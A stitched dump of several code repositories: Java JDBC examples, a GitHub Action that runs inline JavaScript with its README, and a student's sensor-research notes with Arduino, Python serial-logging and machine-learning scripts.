pstmt.setDate(2, new Date(4567890L));
int result = pstmt.executeUpdate();
if(result == 1) {
System.out.println("Inserted sucessfully");
}else {
System.err.println("Something went wrong");
}
}catch (SQLException e) {
DBUtil.showErrorMessage(e);
}
}
}
<file_sep>/src/com/example/crud/IteratingWithResultSet.java
package com.example.crud;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
public class IteratingWithResultSet {
public static void main(String[] args) throws SQLException {
//Try with recourse : no need to close the connection
try (
Connection conn = DBUtil.getConnection(DBType.MSSQL);
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from Employees");
){
String format = "%-4s%-20s%-25s%-10f\n";
while(rs.next()) {
System.out.format(format, rs.getString("Employee_I"), rs.getString("First_name"), rs.getString("last_name"), rs.getFloat("salary"));
}
System.out.println("Total ROws : " + rs.getRow());
}catch (SQLException e) {
DBUtil.showErrorMessage(e);
}
}
}
| 550be9c2f666dea60048ad6c4ce5c4bd776d851d | [
"Markdown",
"Java"
] | 6 | Java | AmhH/test-jdbc | 2fd8ee526910bc238d161d7c060a37fabbcc2d6c | aa90cff76605b34d7c3a9ee8d85328f45be07bd5 |
refs/heads/master | <repo_name>satackey/action-js-inline<file_sep>/index.ts
import * as core from '@actions/core'
import exec from 'actions-exec-wrapper'
const defaultPackages = [
'@actions/core',
'@actions/exec',
'@actions/github',
'actions-exec-listener',
]
// https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/AsyncFunction
const AsyncFunction = Object.getPrototypeOf(async () => {}).constructor
type PackageManager = 'npm' | 'yarn'
function assertIsPackageManager(manager: string): asserts manager is PackageManager {
if (manager !== 'npm' && manager !== 'yarn') {
throw new Error(`Specified node package manager is ${manager}, neither npm nor yarn.`)
}
}
const installPackages = async (manager: PackageManager, packages: string[]) => {
let command = ''
if (manager === 'npm') {
command = 'npm install'
} else {
command = 'yarn add'
}
if (packages.length < 1) {
console.log('There is no package to install.')
return
}
core.startGroup(`${command} ${packages.join(' ')}`)
await exec.exec(command, packages, {
cwd: __dirname,
})
core.endGroup()
}
const runScript = async (script: string) => {
const args: { [key: string]: any} = {
Buffer,
__dirname,
__filename,
console,
exports,
module,
process,
require,
TextDecoder,
TextEncoder,
URL,
URLSearchParams,
WebAssembly,
}
const scriptFunc = new AsyncFunction(Object.keys(args), script)
return await scriptFunc(...Object.values(args))
}
const main = async () => {
const packageManager = core.getInput('package-manager', { required: true })
assertIsPackageManager(packageManager)
const requiredPackages = core.getInput('required-packages')
.split(/\n|\s/) // Split by space or new line
.filter(pkg => pkg !== '') // Remove empty item
const script = core.getInput('script', { required: true })
console.log(script)
await installPackages(packageManager, [...requiredPackages, ...defaultPackages])
await runScript(script)
}
main().catch(e => {
console.error(e)
core.setFailed(`An error occurred: ${e.message || JSON.stringify(e)}`)
})
<file_sep>/README.md
# satackey/action-js-inline
Run JavaScript instead of shell script in GitHub Actions.
## Example
```yaml
- name: Output current branch name & date
# To use latest action, specify "release-master" instead of "v0.0.2"
uses: satackey/action-js-inline@v0.0.2
id: getdata
with:
# Edit the following line to install packages required to run your script.
required-packages: axios
script: |
const core = require('@actions/core')
const axios = require('axios')
// branch
const ref = process.env.GITHUB_REF // refs/heads/master
const branch = ref.split('/').slice(-1)[0] // refs/heads/master → master
console.log(`branch: ${branch}`)
core.setOutput('branch', branch)
// date
const dateResponse = await axios('https://ntp-a1.nict.go.jp/cgi-bin/json')
/* {
"id": "ntp-a1.nict.go.jp",
"it": 0.000,
"st": 1585285722.922,
"leap": 36,
"next": 1483228800,
"step": 1
} */
const date = new Date(dateResponse.data.st)
console.log(`date: ${date}`)
core.setOutput('date', date)
# You can use datas as ${{ steps.getdata.outputs.branch }} and ${{ steps.getdata.outputs.date }}
```
## Inputs
- `package-manager` required, default: `npm`
The package manager used to install the required packages.
Either `npm` or `yarn`.
- `required-packages` optional
Line or space separated package names required to execute the scirpt.
> Info: The following packages are automatically installed even if you do not write them.
> - [`@actions/core`](https://github.com/actions/toolkit/tree/master/packages/core)
> - [`@actions/exec`](https://github.com/actions/toolkit/tree/master/packages/exec)
> - [`@actions/github`](https://github.com/actions/toolkit/tree/master/packages/github)
> - [`actions-exec-listener`](https://github.com/satackey/actions-exec-listener)
- `script` **Required**
The JavaScript snippet to be executed. The [await](https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/await) operator is supported.
## Contribution
PRs are accepted.
If you are having trouble or feature request, [post new issue](https://github.com/satackey/action-js-inline/issues/new).
<!-- ## Another Example -->
| 9b21a4464693f7057d8bd2d8b4381219271c95e0 | [
"Markdown",
"TypeScript"
] | 2 | TypeScript | satackey/action-js-inline | 3a7d2f354bd40d9a02507772062211aa317fdc24 | 3eb8aa97455fce0b0cfec3739682795e56f3dc41 |
refs/heads/master | <repo_name>haydenmcmullin/U1A3<file_sep>/README.md
# U1A3
school work
<file_sep>/RoachPopulation.java
//<NAME>
//U1A3 Roach Population
public class RoachPopulation
{
int num; //Total Population
public RoachPopulation()
{ //constructor sets roach population to 100
num = 100;
}
public void timePasses()
{ //multiplies num by 2 to simulate time passing
num = num*2;
}
public void spray()
{ // decreases the total population by 10% simulating being sprayed by insecticide
num = num*90/100;
}
public double getRoaches()
{ // getter used to get the total roach population.
return num;
}
}
| 1b596d30656f4ee34ab06f9de993ff3ad18c2c06 | [
"Markdown",
"Java"
] | 2 | Markdown | haydenmcmullin/U1A3 | 48a8945edb1c49e978bf307acb8315c70d6de56b | 3a858b8cd86b4aa09c899f84d42933c1594da7b7 |
refs/heads/master | <file_sep>from getmac import get_mac_address
macAddress = (get_mac_address()).replace(":","")
def getDirPath(time):
dir = "MintsData/raw/" + str(macAddress) + "/" + str(time.year) + "/" + ('%02d' % time.month) + "/" + ('%02d' % time.day)
return dir
def getFilePath(time, dir, name):
filePath = dir + "/" + "MINTS_" + macAddress + "_" + name + "_" + str(time.year) + "_" + ('%02d' % time.month) + "_" + ('%02d' % time.day) + ".csv"
return filePath
<file_sep>import numpy as np
import cv2
import sys
import csv
from skimage import io, color
img = cv2.imread('startrails.jpg')
# Get RGB data
inputImage_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)
Image_Array_RGB = np.array(inputImage_RGB)
Image_Shape = Image_Array_RGB.shape
One_D_Image_Red = np.transpose(np.matrix(Image_Array_RGB[:, :, 0].ravel()))
One_D_Image_Green = np.transpose(np.matrix(Image_Array_RGB[:, :, 1].ravel()))
One_D_Image_Blue = np.transpose(np.matrix(Image_Array_RGB[:, :, 2].ravel()))
One_D_Image_RGB = np.concatenate((One_D_Image_Red, One_D_Image_Green, One_D_Image_Blue), axis=1)
# Get HSV data
inputImage_HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
Image_Array_HSV = np.array(inputImage_HSV)
One_D_Image_Hue = np.transpose(np.matrix(Image_Array_HSV[:, :, 0].ravel()))
One_D_Image_Saturation = np.transpose(np.matrix(Image_Array_HSV[:, :, 1].ravel()))
One_D_Image_Value = np.transpose(np.matrix(Image_Array_HSV[:, :, 2].ravel()))
One_D_Image_HSV = np.concatenate((One_D_Image_Hue, One_D_Image_Saturation, One_D_Image_Value), axis=1)
# Get LAB Data
inputImage_LAB = color.rgb2lab(io.imread('startrails.jpg'))
Image_Array_LAB = np.array(inputImage_LAB)
One_D_Image_L = np.transpose(np.matrix(Image_Array_LAB[:, :, 0].ravel()))
One_D_Image_A = np.transpose(np.matrix(Image_Array_LAB[:, :, 1].ravel()))
One_D_Image_B = np.transpose(np.matrix(Image_Array_LAB[:, :, 2].ravel()))
One_D_Image_LAB = np.concatenate((One_D_Image_L, One_D_Image_A, One_D_Image_B), axis=1)
One_D_Image = np.concatenate((One_D_Image_RGB, One_D_Image_HSV, One_D_Image_LAB), axis=1)
title = "Red, Green, Blue, Hue, Saturation, Color, Lightness, A*, B*"
with open("colors.csv", "a") as csvFile:
np.savetxt("colors.csv", One_D_Image, delimiter=",", header=title, fmt='%3.f', comments='')
# writer.writerows(One_D_Image)
<file_sep>/*
Adapted from example code.
Displays visible, IR, and UV light brightness.
*/
#include <Arduino.h>
#include <Wire.h>
#include "SI114X.h"
SI114X SI1145 = SI114X();
void setup() {
Serial.begin(9600);
Serial.println("Beginning Si1145!");
while (!SI1145.Begin()) {
Serial.println("Si1145 is not ready!");
delay(1000);
}
Serial.println("Si1145 is ready!");
}
void loop() {
Serial.print("---\n");
Serial.println("Vis: "); Serial.println(SI1145.ReadVisible());
Serial.println("IR: ");
Serial.println(SI1145.ReadIR());
//the real UV value must be div 100 from the reg value , datasheet for more information.
Serial.println("UV: ");
Serial.println(float(SI1145.ReadUV())/100);
delay(1000);
}
<file_sep># Daily Notes
## Monday June 24, 2019
### Task 1: Disassembling Of Particulate Matter Sensor
Today's work consisted of disassembling particulate matter (PM) sensors. There were two sections within these sensors:
- A portion containing the sensor itself (Optical Particle Counter) and an Argon Arduino Board to manage it.
- A portion containing a GPS, camera module, and the processing units
#### 1.1: Processing Portion (Interior)
**Main Components:**
- G-Mouse GPS Module
- USB 3 Power Hub
- 5.0 MP USB Camera Module
- Linux Computer - Odroid XU4 - central computing unit
- PCB (Argon)
- C1+ Module (Argon) - encrypts data to be sent
- Light Sensor Module
**Dismantling Process**
1. Remove box lid
2. Remove 3D printed frame and all components from box
3. Remove USBs and Ethernet cables
4. Remove USB hub and Ethernet-USB converter
5. Remove wires attached to terminal blocks in PCB
5. Unscrew all circuit boards (XU4 is on underside; PCB is on top; camera and light sensor on side.)
6. Remove GPS module
#### 1.2: Sensor Portion (Exterior)
**Main Components:**
- Steven Sunshields
- Optical Particle Counter (OPC)
- PCB (Manage OPC)
**Dismantling Process:**
1. Free wires from the lid of the interior portion
3. Unscrew and remove all steven sunshields except the base one
4. Unscrew PCB
5. Unplug all wires and cut zipties
**Homework For Today:**
- ~~Obtain basic familiarization with github~~
- ~~Finish daily notes~~
- ~~Chapter 2 Problems of C.M. book~~
__________________________________________________________________________________________________________________________________
## Tuesday June 25, 2019
### Task 2: Construction of Main Processing Unit For Shinyei Sensors
Work for today consisted of soldering and wiring circuit boards which would serve as the central management unit for the complete Shinyei<sup>[1]</sup> sensor.
The processes of soldering, applying heat shrinks, and stripping wires was learned today. Adam was expecting to have 5 of these 'guts' (as he referred to them) for the Shinyei built today betweeen the two of us, but we managed to produce 10 before we were burnt out.
Experience was acquired soldering & dealing with construction of permanent circuitry instead of the breadboard stuff done at home.
**Main Components:**
- Seeduino Microcontroleer
- Seeduino Base Shield - interfacing with sensors and OLED display
- Single Cell LiPO Charger (Sunny Buddy) - manages charging of battery from solar panel
- INA219 DC current sensor ([math]\times[\math] 2) - current and voltage sensor, one for each of battery and solar panel
- Molex Connector (4-pin)
- Molex Connector (2-pin) (x2)
- Terminal Block (2-pin) (x2)
#### 2.1: Solder Connections From Seeduino To INA219s
1. Solder a 2-pin terminal block to each of two INA219 current sensors.
2. Cut a 4-pin Molex to Molex connecter in half and attach one end to the outermost Molex receiver on the Seeduino.
3. Split each of the four wires coing from the Molex connecter attached to the Seeduino by soldering two wires onto each of the aforementioned four wires.
4. Solder a red split wire to VCC on an INA219.
5. Solder a black split wire to Gnd on the same INA219.
6. Solder a yellow split wire to Scl on the same INA219.
7. Solder a white split wire to Sda on the same INA219.
8. Repeat the previous four steps with the other INA219.
#### 2.2: Solder Connections From Single Cell LiPO Charger (Sunny Buddy)
9. Cut off a 2-pin Molex connecter from a LiPO battery.
10. Attach the Molex end to the Molex receiver on the Sunny Buddy.
11. Solder the black wire on the Molex wire to "Solar -" on the Sunny Buddy.
12. Solder a wire to "Solar -" from above the circuit board of the Sunny Buddy /9the other end is loose and will act as a central Gnd).
13. Connect the red wire from the 2-pin Molex to Vin- on an INA219.
14. Connect "Solar +" from the Sunny Buddy to Vin- on the other INA219
#### 2.3: Concluding Steps
15. Push the Seeduino Base Shield onto the Seeduino and verify that the power switch is set to 3.3V.
16. Solder A0 on the INA219 to which "Solar +" was connected to change the address of an INA219 to have Seeduino be able to distinguish between the INA219s
Rough circuit sketch can be found on page 79 of research notebook.
**Homework For Today:**
- ~~Finish Daily Notes~~
- ~~Learn Some C++ Syntax~~
**[1]:** These are cheap air quality sensors that Lakitha and Adam intend on calibrating with machine learning to achieve the same level of accuracy as more expensive sensors. They plan on acquiring data from the expensive sensors and using it to train various ML models. Whichever performs most desirably will be used with the Shinyei sensor data to yield high accuracy with a low cost hardware.
**Note:** A crude circuit diagram for the Shinyei Sensor CMU can be found as an image in this directory.
__________________________________________________________________________________________________________________________________
## Wednesday, June 26, 2019
Work done today was using the different air quality sensors and coding them to display meaningful data.
### Task 3: Complete Arduino Exercises Given On Github
- Logged into the Arduino web IDE
- Finished exercises 2, 3 and 5; they were trivial
- Arduino IDE, Atom IDE, and Platform.io were preinstalled on the Ubuntu computer that was used for this
- Initially there was some difficulty with Exercise 8, largely due to the fact that no prior knowledge or experience existed about Ubuntu OS and Atom IDE, but after some searching the problems were resolved.
- Most modules I had worked with in the past required specification of which pins were to be used. In the code provided, there was no such mention and therefore I thought the code was meant to be run without a sensor.
- Upon running the code, the outputs were all printing 0, so there was something wrong. Upon connecting the BME280 sensor, the readings became normal.
### Task 4: Obtain Familiarization With The Air Quality Sensors
These consisted of the following:
- BME280 - (Temperature, Pressure, Altitude, Humidity)
- TMG3993 - (Light, Gesture, RGBC, Proximity)
- SCD30 - (CO2 Concentration, Temperature, Humidity)
- Multichannel Gas Sensor - (Concentrations of NH<sub>3</sub>, CO, NO<sub>2</sub>, C<sub>3</sub>H<sub>8</sub>, C<sub>4</sub>H<sub>10</sub>, CH<sub>4</sub>, H<sub>2</sub>, C<sub>2</sub>H<sub>5</sub>OH)
#### 4.1: BME280 - Temperature, Pressure, Altitude, Humidity
Following is the code for Nano to print everything BME280 can sense with a update delay of 1 second
- Include libraries
- Initialize sensor as instance of BME280 object
- Setup
- - Initialize Wire
- - Initialize Serial with baud rate 9600
- - If sensor fails to initialize then print error
- Loop
- - Print all information acquired by sensor to Serial Monitor
- - Remember that altitude is calculated as a function of pressure
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_BME280.h"
BME280 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("BME280 Temperature, Pressure, Altitude, and Humidity");
if (!sensor.init()) {
Serial.print("Error with sensor");
}
}
void loop() {
Serial.print("Temperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nPressure: ");
Serial.print(sensor.getPressure());
Serial.print(" Pa");
Serial.print("\nAltitude: ");
Serial.print(sensor.calcAltitude(sensor.getPressure()));
Serial.print("m \nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("% \n --- \n");
delay(1000);
}
~~~~
#### 4.2: TMG3993 - Light, Gesture, Proximity, RGBC
Following is the code for proximity detection from the TMG3993. It prints when proximity is detected or removed and LED_BUILTIN flashes when status of proximity changes.
- Include libraries
- Initialize sensor as instance of TMG3993 object
- Initialize status of proximity as 0 (removed)
- Setup
- - Initialize Serial with baud rate 9600 and print sensor info
- - Initialize Wire
- - If sensor fails to initialize then print error
- - Setup sensor for proximity detection
- Loop
- - Run following code only if sensor status is acquired and is valid (working properly)
- - - Get proximity of object to sensor
- - - If proximity is above threshold and status of proximity is 0 (removed) then print detection to Serial and set new status of proximity as 1 (detected)
- - - If proximity is below threshold and status of proximity is 1 (detected) then print detection to Serial and set new status of proximity as 0 (removed)
- - Delay 1 millisecond for stability
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
int proximity_status = 0;
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check Wiring");
}
sensor.setupRecommendedConfigForProximity();
sensor.enableEngines(ENABLE_PON | ENABLE_PEN | ENABLE_PIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_PVALID)
{
int proximity = sensor.getProximityRaw();
if (proximity < 50 && proximity_status == 0) {
Serial.println("Proximity Detected");
proximity_status = 1;
}
if (proximity > 50 && proximity_status == 1) {
Serial.println("Proximity Removed");
proximity_status = 0;
}
}
delay(1);
}
~~~~
Following is the code for reading RGBC data (C stands for clear) for same sensor (TMG3993)
- Include libraries
- Initialize sensor as instance of TMG3993 object
- Setup
- - Initialize Serial with baud rate 9600 and print sensor info
- - Initialzie Wire
- - If sensor fails to initialize then print error
- - Set up sensor for sensing RGBC
- Loop
- - Run following code only if sensor status is acquired and is valid (working properly)
- - - Initialize r, g, b, c, lux, cct
- - - Get RGBC data by passing pointers of r, g, b, c to getRGBCRaw function so that it may overwrite those values
- - - Pass r, g, b, c to getLux and getCCT functions to get illuminance in luxes and CCT (Correlated Color Temperature) in Kelvin
- - - Print all this info to Serial
- - Delay 1 second for stability and readability
~~~~
/*
Adapted From example code
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check wiring");
while (1);
}
sensor.setADCIntegrationTime(0xdb); // the integration time: 103ms
sensor.enableEngines(ENABLE_PON | ENABLE_AEN | ENABLE_AIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_AVALID)
{
int r,g,b,c;
int lux, cct;
sensor.getRGBCRaw(&r, &g, &b, &c);
lux = sensor.getLux(r, g, b, c);
cct = sensor.getCCT(r, g, b, c);
Serial.print("R: ");
Serial.print(r);
Serial.print("\tG: ");
Serial.print(g);
Serial.print("\tB: ");
Serial.print(b);
Serial.print("\tC: ");
Serial.println(c);
Serial.print("Lux: ");
Serial.print(lux);
Serial.print("\tCCT: ");
Serial.println(cct);
Serial.println("----");
sensor.clearALSInterrupts();
}
delay(1000);
}
~~~~
#### 4.3: SCD30 - CO2 Concentration, Temperature, Humidity
Following is code to detect all information from SCD30 sensor with measurement interval of 2 seconds.
- Include libraries
- Initialize sensor as instance of SCD30 object
- Setup
- - Initialize Wire
- - Initialize Serial with baud rate 9600 and print sensor information
- - Initialize sensor and set measurement interval 2 seconds
- Loop
- - Print sensor info to Serial Monitor
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "SparkFun_SCD30_Arduino_Library.h"
SCD30 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("SCD30 CO2, Temperature, and Humidity");
sensor.begin();
sensor.setMeasurementInterval(2);
}
void loop() {
Serial.print("CO2 Concentration:");
Serial.print(sensor.getCO2());
Serial.print(" ppm\nTemperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("%\n---\n");
}
~~~~
Similarly we can use
~~~~
sensor.setAltitudeCompensation(altitude in meters);
~~~~
and
~~~~
setAmbientPressure(pressure in millibars)
~~~~
to set default altitude and pressure respectively.
#### 4.4: Multichannel Gas Sensor - Concentrations of NH<sub>3</sub>, CO, NO<sub>2</sub>, C<sub>3</sub>H<sub>8</sub>, C<sub>4</sub>H<sub>10</sub>, CH<sub>4</sub>, H<sub>2</sub>, C<sub>2</sub>H<sub>5</sub>OH
Following is the code for printing all information from this sensor to Serial Monitor. Due to time constraints, preheating and calibration were omitted.
- Include libraries
- Setup
- - Initialize Serial with baud rate 9600
- - Initialize sensor communication and power on
- Loop
- - For each gass measurable by the sensor, find its concentration as sensed
- - If concentration < 0 ppm then print error
- - Otherwise print gas and corresponding concentration to Serial Monitor
- - Delay 1 second for stability and readability
~~~~/*
Written by <NAME>
Displays concentrations of NH3, CO, NO2, C3H8, C4H10, CH4, H2, C2H5OH.
*/
#include <Arduino.h>
#include <Wire.h>
#include "MutichannelGasSensor.h"
void setup()
{
Serial.begin(9600);
gas.begin(0x04); //the default I2C address of the slave is 0x04
gas.powerOn();
}
void loop()
{
char gasses[8] = {'NH3', 'CO', 'NO2', 'C3H8', 'C4H10', 'CH4', 'H2', 'C2H5OH};
float concentrations[8] = {gas.measureNH3(), gas.measureCO2(), gas.measureNO2(), gas.measureC3H8(), gas.measureC4H10(), gas.measureCH4(), gas.measureH2(), gas.measureC2H5OH()};
for (int i = 0; i < 8; i++) {
Serial.print("The concentration of ");
Serial.print(gasses[i]);
Serial.print(" is:");
if (concentrations[i] >= 0) {
Serial.print(concentrations[i]);
} else {
Serial.print("invalid");
}
Serial.println(" ppm\n");
}
delay(1000);
Serial.println("---");
}
~~~~
#### 4.4: Grove Sunlight Sensor: Visible, IR, UV Light
Following is the code for displaying visible, IR, and UV light brightness. Visible and IR measured in lumens while UV measured by UV index.
- Include libraries
- Initialize SI1145 as instance of SI114X object
- Setup
- - Initialize Serial with baud rate 9600 and print when sensor is initialized
- Loop
- - Compute and print readings for visible, IR, UV
- - Note that UV index is UV in lumens divided by 100
- - Delay 1 second for stability and readability
~~~~
/*
Adapted from example code
*/
#include <Arduino.h>
#include <Wire.h>
#include "SI114X.h"
SI114X SI1145 = SI114X();
void setup() {
Serial.begin(9600);
Serial.println("Beginning Si1145!");
while (!SI1145.Begin()) {
Serial.println("Si1145 is not ready!");
delay(1000);
}
Serial.println("Si1145 is ready!");
}
void loop() {
Serial.print("---\n");
Serial.println("Vis: "); Serial.println(SI1145.ReadVisible());
Serial.println("IR: ");
Serial.println(SI1145.ReadIR());
//the real UV value must be div 100 from the reg value , datasheet for more information.
Serial.println("UV: ");
Serial.println(float(SI1145.ReadUV())/100);
delay(1000);
}
~~~~
- Receiving baud rate had to be altered from 9600 to 115200 however due to unknown reasons, even when Serial.begin was run with an argument of 9600. It could be a bug in the Nano or maybe it is just how the SI114X sensor
- Lastly all sensors were connected to the Nano and used simultaneously.
All code can be found under NanoUTD/sensorCode.
**Homework:**
- ~~Finish daily notes~~
- ~~Make Basic Python Projects~~
- ~~Start learning Python-TensorFlow~~
- Learn mechanics of RNNs, LSTM, CNNs
References for quadrotor SLAM - CNNs for 2D images to depth mapping:
(1): http://visual.cs.ucl.ac.uk/pubs/monoDepth/
(2): https://github.com/mrharicot/monodepth/
__________________________________________________________________________________________________________________________________
## Tuesday August 6, 2019
Today's work consisted of two main tasks.
### Task 5: Construct Large Checkerboard Grid for Overlay Calibration of Thermal and Rgb Cameras
Lakitha is working on overlaying images of a thermal and rgb camera for various distances. He has calibrated them for short distances with a small chess board, but for larger distances he needed a larger grid. Thus, we built that by pasting aluminum squares (cold) on a foam board (warm).
High level program flow can be found in this directory as `VapeDetectorProgramFlow.jpg`
### Task 6: Develop Python Script for Saving Ozone Sensor Data to CSV
Using PuTTY terminal emulator we communicated with Ozone Sensor 108L to print ozone concentration, temperature, presure, and voltage. Python script was developed to convert data received from Sensor 108L to csv format and save. This script can be found in this directory as SerialReaderOzone.py.
Receiving baudrate was 2400.
Program's basic flow was receiving sensor data and saving it in a dictionary, then logging each dictionary update to csv format in a separate directory.
After saving to csv we noticed that '\n' and '\r' and '~' was appearing in the csv which was undesirable, thus we using `string.rstrip(k)` for `k in ['\n', '\r', '~']` to rid each line of these characters.
**Homework:**
- ~~Finish daily notes~~
________________________________________________________________________________________________________________________________________
## Wednesday August 7th, 2019
Today's work was similar to day 2. Adam and I built Shinyei sensor central management units. I made 5 and he cranked out 10 for a total of 15. They are almost 3/4th the way to their 100 units goal.
A picture of what the final product looks like can be found in this directory as `ShinyeiCMUPicture.jpg`.
<file_sep>import serial
import csv
import os
from datetime import datetime
import serialDefinitions as fl
import json
import serial.tools.list_ports
now = datetime.utcnow()
def fillDict(dict, data):
curDat = [0] + data.split(":")
for key, dat in zip(dict.keys(), curDat):
dict[key] = dat
dict["utc-time"] = datetime.utcnow()
def makeCSV(dict, name):
#Find/make directory
dir = fl.getDirPath(now)
if(not(os.path.exists(dir))):
os.makedirs(dir)
#Find/make file path
filePath = fl.getFilePath(now, dir, name)
makeHeader = not(os.path.isfile(filePath))
#Get keys
keys = list(dict.keys())
#Input data to file
with open(filePath, "a") as csvFile:
writer = csv.DictWriter(csvFile, fieldnames=keys);
if(makeHeader):
writer.writeheader()
writer.writerow(dict)
csvFile.close()
def processData(data):
print(data)
data = data.split(">")
try:
if(data[0] == "#mintsO!PPD42NSDuo"):
fillDict(PPD42NSDuo, data[1])
jsonMaker("PPD42NSDuo.json", PPD42NSDuo)
makeCSV(PPD42NSDuo, "PPD42NSDuo")
elif(data[0] == "#mintsO!BME280"):
fillDict(BME280, data[1])
jsonMaker("BME280.json", BME280)
makeCSV(BME280, "BME280")
elif(data[0] == "#mintsO!MGS001"):
fillDict(MGS001, data[1])
jsonMaker("MGS001.json", MGS001)
makeCSV(MGS001, "MGS001")
elif(data[0] == "#mintsO!SCD30"):
fillDict(SCD30, data[1])
jsonMaker("SCD30.json", SCD30)
makeCSV(SCD30, "SCD30")
elif(data[0] == "#mintsO!OPCN2"):
fillDict(OPCN2, data[1])
jsonMaker("OPCN2.json", OPCN2)
makeCSV(OPCN2, "OPCN2")
except:
print("Data cannot be processed")
def jsonMaker(fileName, dict):
with open(fileName, 'w') as f:
json.dump(dict, f, default=str)
#Create a dictionary for each sensor's variables
BME280 = {"utc-time": 0, "temperature": 0, "pressure": 0, "humidity": 0, "altitude": 0}
MGS001 = {"utc-time": 0, "nh3": 0, "co": 0, "no2": 0, "c3h8": 0, "c4h10": 0, "ch4": 0, "h2": 0, "c2h5oh": 0}
OPCN2 = {"utc-time": 0, "valid": 0, "binCount0": 0, "binCount1": 0, "binCount2": 0, "binCount3": 0, "binCount4": 0, "binCount5": 0, "binCount6": 0, "binCount7": 0,
"binCount8": 0, "binCount9": 0, "binCount10": 0, "binCount11": 0, "binCount12": 0, "binCount13": 0, "binCount14": 0, "binCount15": 0,
"bin1TimeToCross": 0, "bin3TimeToCross": 0, "bin5TimeToCross": 0, "bin7TimeToCross": 0, "sampleFlowRate": 0, "temperatureOrPressure": 0, "samplingPeriod": 0, "checkSum": 0,
"pm1": 0, "pm2_5": 0, "pm10": 0}
SCD30 = {"utc-time": 0, "co2": 0, "temperature": 0, "humidity": 0}
PPD42NSDuo = {"utc-time": 0, "sampleTimeSeconds": 0, "LPOPmMid": 0, "LPOPm10": 0, "ratioPmMid": 0, "ratioPm10": 0, "concentrationPmMid": 0, "concentrationPm2_5": 0, "concentrationPm10": 0}
#Set up serial port
li = serial.tools.list_ports.comports()
connected = []
for element in li:
connected.append(element.device)
ser = serial.Serial(port=connected[2], baudrate=9600, timeout=5)
#Read data
curData = ""
reading = False
while True:
try:
char = (ser.read(1)).decode('utf-8')
if(char == '#'):
reading = True
curData = str(char)
elif(char == '~'):
processData(curData)
curData = ""
reading = False
elif(reading):
curData = curData + str(char)
else:
print(str(char), end = "")
except:
print("Data not received")
<file_sep># -*- coding: utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# load dataset
data = pd.read_csv("../downloads/winequality.csv")
data.shape
def thing(x):
return x - 2
# clean dataset
# remove null values if any
data[data.isnull()] = 0
data["free sulfur dioxide"] = data["free sulfur dioxide"].apply(lambda x: (x - 15)/10)
data["pH"] = data["pH"].apply(lambda x: (x - 3.5)*2)
data["thing"] = data["thing"].apply(lambda x: x-9)
data["total sulfur dioxide"] = data["total sulfur dioxide"].apply(lambda x: (x-100)/50)
data["fixed acidity"] = data["fixed acidity"].apply(lambda x: (x-8))
data["residual sugar"] = data["residual sugar"].apply(lambda x: (x-2))
plt.figure(0)
plt.hist(data["pH"])
# split into training and test sets
# predict quality of wine
train, test = train_test_split(data, test_size=.2)
train_in = train.loc[:, :"sulphates"]
train_out = train["quality"]
test_in = test.loc[:, :"sulphates"]
test_out = test["quality"]
reg=linear_model.LinearRegression().fit(train_in, train_out)
pred = reg.predict(test_in)
plt.figure(1)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(test_out, pred, 'o')
print("Linear reg error ", mean_squared_error(pred, test_out))
# create model = > neural network
# use test set to predict values
from sklearn.neural_network import MLPRegressor
nn = MLPRegressor(hidden_layer_sizes=(3,2), activation='relu', solver='lbfgs', alpha=0.001,
batch_size=10, learning_rate="constant", max_iter=5000, tol=0.0005, verbose=False)
nn.fit(train_in, train_out)
nn_pred = nn.predict(test_in)
nn_trained = nn.predict(train_in)
plt.figure(2)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(train_out, nn_trained, 'ro')
plt.plot(test_out, nn_pred, 'bo')
print("Neural Network error ", mean_squared_error(nn_pred, test["quality"]))
print("Neural Network trained error ", mean_squared_error(nn_trained, train["quality"]))
# Random Forest
from sklearn.ensemble import RandomForestRegressor
regr = RandomForestRegressor(max_depth=15, random_state=0, n_estimators=100)
regr.fit(train_in, train_out)
print(regr.feature_importances_)
rf_pred = regr.predict(test_in)
plt.figure(3)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(train_out, regr.predict(train_in), 'bo')
plt.plot(test_out, rf_pred, 'ro')
print("Random Forest error ", mean_squared_error(rf_pred, test_out))
<file_sep>/*
Written by <NAME>
Displays concentrations of NH3, CO, NO2, C3H8, C4H10, CH4, H2, C2H5OH.
*/
#include <Arduino.h>
#include <Wire.h>
#include "MutichannelGasSensor.h"
void setup()
{
Serial.begin(9600);
gas.begin(0x04); //the default I2C address of the slave is 0x04
gas.powerOn();
}
void loop()
{
char gasses[8] = {'NH3', 'CO', 'NO2', 'C3H8', 'C4H10', 'CH4', 'H2', 'C2H5OH'};
float concentrations[8] = {1, 2, 3, 4, 5, 6, 7, 8};
for (int i = 0; i < 8; i++) {
Serial.print("The concentration of ");
Serial.print(gasses[i]);
Serial.print(" is:");
if (concentrations[i] >= 0) {
Serial.print(concentrations[i]);
} else {
